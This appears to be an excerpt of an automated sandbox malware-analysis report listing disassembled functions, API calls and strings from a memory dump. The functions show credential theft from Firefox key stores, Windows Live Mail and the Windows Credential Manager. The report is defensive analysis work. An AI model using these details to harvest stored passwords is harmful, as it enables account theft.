                                                                                                                                                                                  • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                  • API String ID: 3614188050-3983245814
                                                                                                                                                                                  • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                  • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                  • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                  Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                  • API String ID: 710961058-601624466
                                                                                                                                                                                  • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                  • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                  • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                  Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                  • API String ID: 3402215030-3842416460
                                                                                                                                                                                  • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                  • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                  • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                  Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                    • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                  • API String ID: 2003275452-3138536805
                                                                                                                                                                                  • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                  • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                  Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                  • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                  • API String ID: 1012775001-1343505058
                                                                                                                                                                                  • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                  • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                  • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                  Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi
                                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                  • API String ID: 1439213657-1959339147
                                                                                                                                                                                  • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                  • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                  Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00444612
                                                                                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                  • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                  • memset.MSVCRT ref: 00444668
                                                                                                                                                                                  • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                  • memset.MSVCRT ref: 00444690
                                                                                                                                                                                  • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                  • String ID: salu
                                                                                                                                                                                  • API String ID: 3691931180-4177317985
                                                                                                                                                                                  • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                  • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                  Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA,7570CFBC), ref: 00410060
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                  • API String ID: 2449869053-232097475
                                                                                                                                                                                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                  Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                  • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                  • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                    • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Salt, xrefs: 00443BA7
                                                                                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                  • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                  • API String ID: 665470638-2687544566
                                                                                                                                                                                  • Opcode ID: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                  • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                  • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                  Function 00403E96 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                  • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                  • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                  • API String ID: 113626815-1670831295
                                                                                                                                                                                  • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                  • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                                                                  Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                  • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                  • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                  • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                  • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                  • API String ID: 3259144588-3822380221
                                                                                                                                                                                  • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                  • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                  Function 0040FFB0 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 0040FFD8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                                  • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                  • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                                                                                                                                                  Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                  • API String ID: 2449869053-4258758744
                                                                                                                                                                                  • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                  • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                  Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040F92C
